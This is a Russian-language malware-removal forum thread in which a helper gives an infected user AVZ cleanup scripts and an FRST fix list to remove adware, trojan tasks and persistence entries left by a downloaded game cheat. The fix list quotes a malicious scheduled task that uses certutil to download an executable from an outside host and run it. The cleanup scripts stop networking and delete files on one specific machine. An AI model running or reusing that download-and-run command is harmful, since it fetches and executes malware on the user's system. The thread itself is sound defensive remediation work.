Решена Поймал вирус, после загрузки "недо-чита"

[shutg]

Здравствуйте.
Последняя надежда, так сказать, на Вашу помощь....
Перепробывал многие утилиты, вручную чистил, все равно ничего не меняется, вылезает реклама сайта THEGOODCASTER.COM и еще какие то без домена, как я полагаю.
Помогите...

 

[Sandor]

Здравствуйте!

Через Панель управления - Удаление программ - удалите нежелательное ПО:

IObit Software Updater
Main service
SafeFinder
YoutubeAdBlock
Элементы Яндекса 8.0 для Internet Explorer

Что не получится удалить стандартно, удалите принудительно через Geek Uninstaller

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями SafeZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
 DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;  
 ImagePathStr, RootStr, SubRootStr, LangID: string;
 AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
 FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; 
 RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;

procedure CheckAndRestoreSection(Root: String);
begin
 Inc(AllRoots);
 if RegKeyExistsEx('HKLM', Root) then
   RegKeyResetSecurity('HKLM', Root)
 else
  begin
    Inc(RootsRestored);
    RegKeyCreate('HKLM', Root);
    AddToLog(RegSectMsg + Root + RestMsg);
   end;
end;

procedure CheckAndRestoreSubSection;
begin
  CheckAndRestoreSection(SubRootStr);
end;

procedure RestoredMsg(Root, Param: String);
begin
  AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
  Inc(KeysRestored);
end;

procedure FixedMsg(Root, Param: String);
begin
  AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
  Inc(KeysFixed);
end;

procedure RestoreStrParam(Root, Param, Value: String);
begin
  RegKeyStrParamWrite('HKLM', Root, Param, Value);
  RestoredMsg(Root, Param);
end;

procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
  Inc(AllKeys);
  if not RegKeyParamExists('HKLM', Root, Param) then
    RestoreStrParam(Root, Param, Value);
end;

procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', Root, Param) then 
  begin
    RegKeyIntParamWrite('HKLM', Root, Param, Value);
    RestoredMsg(Root, Param);
  end;
end;

procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, Param) then
  begin
    ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
    RestoredMsg(RootStr, Param);
  end;
end;

// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
 RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
 if RegKeyExistsEx('HKLM', RegStr) then
  begin
    Inc(AllKeys);
    RegKeyResetSecurity('HKLM', RegStr);
    RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
    FixedMsg(RegStr, 'ImagePath');
  end;
end;

{ Выполнение исправление всех ключей в ветках -
   'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
     i : integer;
begin
 if Srv = 'BITS' then
   FileServiceDll := FullPathSystem32 + 'qmgr.dll'
 else
   FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
 RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;

 CheckAndRestoreSection(RootStr);

 CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
 CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
 CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
   RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
 else
  begin
    Dec(AllKeys);
    if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
      for i:= 0 to 999 do
       begin
         if i > 0 then
           CCSNumber := FormatFloat('ControlSet000', i)
         else
           CCSNumber := 'CurrentControlSet';
         ImagePathFix(CCSNumber, Srv);
      end;
   end;

 CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
 CheckAndRestoreIntParam(RootStr, 'Start', 2);
 CheckAndRestoreIntParam(RootStr, 'Type', 32);

 if Srv = 'BITS' then
  begin
    CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
    CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
  end;

 SubRootStr:= RootStr + '\Enum';
 CheckAndRestoreSubSection;

 CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
 CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
 CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);

 SubRootStr := RootStr + '\Security';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
  begin
    RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
    RestoredMsg(SubRootStr, 'Security');
  end;

 SubRootStr:= RootStr + '\Parameters';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    RestoredMsg(SubRootStr, 'ServiceDll');
  end
 else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    FixedMsg(SubRootStr, 'ServiceDll');
  end
end;

{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp');
 TerminateProcessByName('C:\Program Files (x86)\Sending\807482082.exe');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp');
 TerminateProcessByName('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp', '');
 QuarantineFile('C:\Program Files (x86)\Sending\807482082.exe', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp', '');
 QuarantineFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-IPNII.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-8F4VL.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-PGT87.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-7M6FH.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-NLD3F.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{21D3E532-D556-4E29-8EF9-96E6FD93EB94}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{40DD8514-79A7-48D0-8206-2E626B333957}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{F636453F-8024-46F6-A8EA-0BBAFF8F135C}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{89F63FAC-A1A9-4F15-8C69-30276525D384}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-S60QV.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-V36C1.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-UBAVD.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-G8QPQ.tmp\idp.dll', '');
 QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '');
 QuarantineFile('C:\Users\Компауктер\AppData\Local\App\svchost.exe', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp', '');
 DeleteFile('C:\Program Files (x86)\Sending\807482082.exe', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp', '');
 DeleteFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '');
 DeleteFile('c:\windows\rss\csrss.exe', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-IPNII.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-8F4VL.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-PGT87.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-7M6FH.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-NLD3F.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{21D3E532-D556-4E29-8EF9-96E6FD93EB94}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{40DD8514-79A7-48D0-8206-2E626B333957}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{F636453F-8024-46F6-A8EA-0BBAFF8F135C}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{89F63FAC-A1A9-4F15-8C69-30276525D384}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-S60QV.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-V36C1.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-UBAVD.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-G8QPQ.tmp\idp.dll', '');
 DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '64');
 DeleteFile('C:\Program Files (x86)\Sending\807482082.exe', '64');
 DeleteFile('C:\Users\Компауктер\AppData\Local\App\svchost.exe', '64');
 DeleteFile('C:\Windows\rss\csrss.exe', '64');
 DeleteFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '64');
 ClearLog;
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
 LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); 
 if LangID = '0419' then
  begin
    DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
    DispayNameTextWuauServ := 'Автоматическое обновление';
    DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
    DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
    AddToLog('Операционная система - русская');
    FinishMsg := '–––– Восстановление завершено ––––';
    RestoreMsg := 'Восстановлено разделов\параметров: ';
    FixMsg := 'Исправлено параметров: ';
    CheckMsg := 'Проверено разделов\параметров: ';
    RegSectMsg := 'Раздел реестра HKLM\';
    ParamMsg := 'Параметр ';
    ParamValueMsg := 'Значение параметра ';
    InRegSectMsg := ' в разделе реестра HKLM\';
    CorrectMsg := ' исправлено на оригинальное.';
    RestMsg := 'восстановлен.';
  end
 else if LangID = '0409' then
  begin
    DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
    DispayNameTextWuauServ := 'Automatic Updates'; 
    DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
    DispayNameTextBITS := 'Background Intelligent Transfer Service';
    AddToLog('Operation system - english');
    FinishMsg := '–––– Restoration finished ––––';
    RestoreMsg := 'Sections\parameters restored: ';
    FixMsg := 'Parameters corrected: ';
    CheckMsg := 'Sections\parameters checked: ';
    RegSectMsg := 'Registry section HKLM\';
    ParamMsg := 'Parameter ';
    ParamValueMsg := 'Value of parameter ';
    InRegSectMsg := ' in registry section HKLM\';
    CorrectMsg := ' corrected on original.';
    RestMsg := ' restored.';
  end;
 AddToLog('');

{ Определение папки X:\Windows\System32\ }
 NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
 ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
 Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
 FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
 
 AllRoots := 0;
 AllKeys := 0;
 RootsRestored := 0;
 KeysRestored := 0;
 KeysFixed := 0;

 CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
 CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');

 AddToLog('');
 AddToLog(FinishMsg);
 AddToLog('');
 AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
 AddToLog(FixMsg + IntToStr(KeysFixed));
 AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
 SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
 DeleteSchedulerTask('csrss');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Synapse3', '64');
 RegKeyParamDel('HKEY_USERS','.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run','Synapse3', '32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\RunOnce','i2ggdebicrf', '64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\App','command', '64');
 DeleteService('WinmonProcessMonitor');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

Компьютер перезагрузится.
После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему посту.


После перезагрузки, выполните такой скрипт:

begin
 DeleteFile(GetAVZDirectory+'quarantine.7z');
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.



Для повторной диагностики запустите снова AutoLogger.
Прикрепите к следующему сообщению свежий CollectionLog.

 

[shutg]

Нежелательные вроде как удалил.

 

[Sandor]

AVZ запускайте эту версию:

C:\Users\Компауктер\Downloads\AutoLogger-test\AutoLogger\AVZ\avz.exe

 

[shutg]

Имя карантина:
2019.07.18_quarantine_5892911de91eedab1926941e99e74c3f.7z

 

[Sandor]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[shutg]

Вот

 

[Sandor]

Нежелательные вроде как удалил

По-прежнему в списке установленных

Main service
YoutubeAdBlock

Удалите принудительно.

Затем:

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  CreateRestorePoint:
  CloseProcesses:
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [YoungWood] => C:\Windows\rss\csrss.exe [5132288 2019-07-18] () [File not signed] <==== ATTENTION
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [ç'2+plA#p8.exe] => C:\Program Files\Windows NT\9IOMHVSST0TCI8Y35LF2TZR6E\ç'2+plA#p8.exe 
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [2705260] => C:\Users\Компауктер\AppData\Roaming\zu4amnvtgvr\254qbvv2tp4.exe [1866371 2019-07-17] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [6583976] => C:\Users\Компауктер\AppData\Roaming\crnof3twn1e\kevyn4knivc.exe [1866371 2019-07-17] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [7574684] => C:\Users\Компауктер\AppData\Roaming\4qavsr3x335\w11b02mylic.exe [1866371 2019-07-17] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3884524] => C:\Users\Компауктер\AppData\Roaming\ch51whag4gk\0azhp2m0ygx.exe [1866371 2019-07-17] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [7809743] => C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0\m4usqulpfrg.exe [1866371 2019-07-18] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [GIBTQCD27PGP7SR] => C:\Program Files\CZLZVGPLWK\CZLZVGPLW.exe [1005568 2019-07-18] (1VYUW) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3981224] => C:\Users\Компауктер\AppData\Roaming\jclyrksahme\hemqvsph1fz.exe [1866371 2019-07-18] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [CloudNet] => C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-18] (EpicNet Inc.) [File not signed] <==== ATTENTION
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3327155] => C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c\3hxl4zyymnv.exe [1866371 2019-07-18] ( ) [File not signed]
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [DUOZ9792LTR9WU0] => C:\Program Files\KACSYMBLU9\KACSYMBLU.exe [1005568 2019-07-18] (1VYUW) [File not signed]
  GroupPolicy: Restriction - Chrome <==== ATTENTION
  CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
  Task: {008418BB-1111-4982-8B82-E778F1744239} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://gamedemo.xyz/app/app.exe C:\Users\Компауктер\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Компауктер\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
  Task: {2FFC31DC-6D13-4B2D-9295-6FF7DA5F046B} - System32\Tasks\raSRPAMuIMRBbwMvC2 => rundll32 "C:\Program Files (x86)\woOqILJDRwqbnTOZbgR\vzSXBiV.dll",#1
  Task: {7990DB9E-56F6-4C42-B5CF-B71969AFA0D4} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5132288 2019-07-18] () [File not signed] <==== ATTENTION
  Task: {B01AA887-1515-4316-89B6-B9BA05C5956E} - System32\Tasks\AWWcazHJnUfLPA => rundll32 "C:\Program Files (x86)\WOFbcaOaHmAU2\yonHRkgDQgQOz.dll",#1
  Task: {BD8C4F29-6FFA-416F-8F99-D8835E92C1F3} - System32\Tasks\txgYfgWClJeJBSoaCDR2 => rundll32 "C:\Program Files (x86)\BbdjrrKUeUXuC\MmTSDoE.dll",#1
  Task: {E0B2FD73-0171-4618-855B-416F93A4755E} - System32\Tasks\JSpPUlYEOjGQEpF2 => rundll32 "C:\Program Files (x86)\rZdaClXBU\oHkDgO.dll",#1
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGtusdZo2wa5vPziXtpMHiFAFEZjecz_bZMTRqZ3nD6F3eD7RCOwMHSRa41YdeJb_fO9PhwadGhtSPWZLttF1PLftx8e-A0mT1gaR0iEWkR_mU_knkeAAUhMOYpLAoaHp_mjGfba5uSW4OqnXi17v_VV2XQj_8OXYUfFLzNC9uGz&q={searchTerms}
  HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGtusdZo2wa5vPziXtpMHiFAFEZjecz_bZMTRqZ3nD6F3eD7RCOwMHSRa41YdeJb_fO9PhwadGhtSPWVB_ZJXfy9v33Oqj52VEDQ0UHnJBybNdPZqcsGN6dGgFOgr0I9aejHCgpAp3VZAwSiGGBlxkyzCPyo5k8BYXoqdBe6K7Fs
  SearchScopes: HKLM-x32 -> DefaultScope value is missing
  FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP
  FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
  C:\Users\Компауктер\AppData\Roaming\Opera Software\Opera Stable\Extensions\idmfcgobgdhohmmpmldpceldejenflci
  C:\Users\Компауктер\AppData\Roaming\Opera Software\Opera Stable\Extensions\nknpohplagminmhchlbhigcgcdfigion
  R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Access Denied) <==== ATTENTION (Access Denied)
  S2 Main Service; C:\Program Files (x86)\MachinerData\ModularInstaller.exe [2801470 2019-07-18] () [File not signed]
  2019-07-18 13:26 - 2019-07-18 13:27 - 000000000 ____D C:\Users\Компауктер\AppData\LocalLow\fuXIbnpPYAACF
  2019-07-18 13:26 - 2019-07-18 13:26 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
  2019-07-18 13:25 - 2019-07-18 13:25 - 000003208 _____ C:\Windows\System32\Tasks\csrss
  2019-07-18 13:02 - 2019-07-18 13:02 - 000003202 _____ C:\Windows\System32\Tasks\AWWcazHJnUfLPA
  2019-07-18 13:02 - 2019-07-18 13:02 - 000002872 _____ C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2
  2019-07-18 13:02 - 2019-07-18 13:02 - 000002860 _____ C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Users\Все пользователи\JrsbweBqGiQFiyVB
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\ProgramData\JrsbweBqGiQFiyVB
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files\KACSYMBLU9
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\woOqILJDRwqbnTOZbgR
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\WOFbcaOaHmAU2
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\vONNFjhTKIE
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\uvtpOaoQoRUn
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\rZdaClXBU
  2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\BbdjrrKUeUXuC
  2019-07-18 12:42 - 2019-07-18 13:25 - 000003516 _____ C:\Windows\System32\Tasks\ScheduledUpdate
  2019-07-18 12:42 - 2019-07-18 12:42 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\jclyrksahme
  2019-07-18 12:42 - 2019-07-18 12:42 - 000000000 ____D C:\Program Files\CZLZVGPLWK
  2019-07-18 02:48 - 2019-07-18 02:48 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\gtktbi2qeg4
  2019-07-18 02:48 - 2019-07-18 02:48 - 000000000 ____D C:\Program Files\D24SXXXQ3N
  2019-07-18 02:28 - 2019-07-18 02:28 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\khun2zmqo4f
  2019-07-18 02:28 - 2019-07-18 02:28 - 000000000 ____D C:\Program Files\LWAKZUUI1M
  2019-07-18 02:08 - 2019-07-18 02:16 - 000000000 ____D C:\Program Files\XHKZU2V44D
  2019-07-18 02:08 - 2019-07-18 02:08 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\y3lrrzpucgn
  2019-07-18 02:06 - 2019-07-18 02:06 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\EpicNet Inc
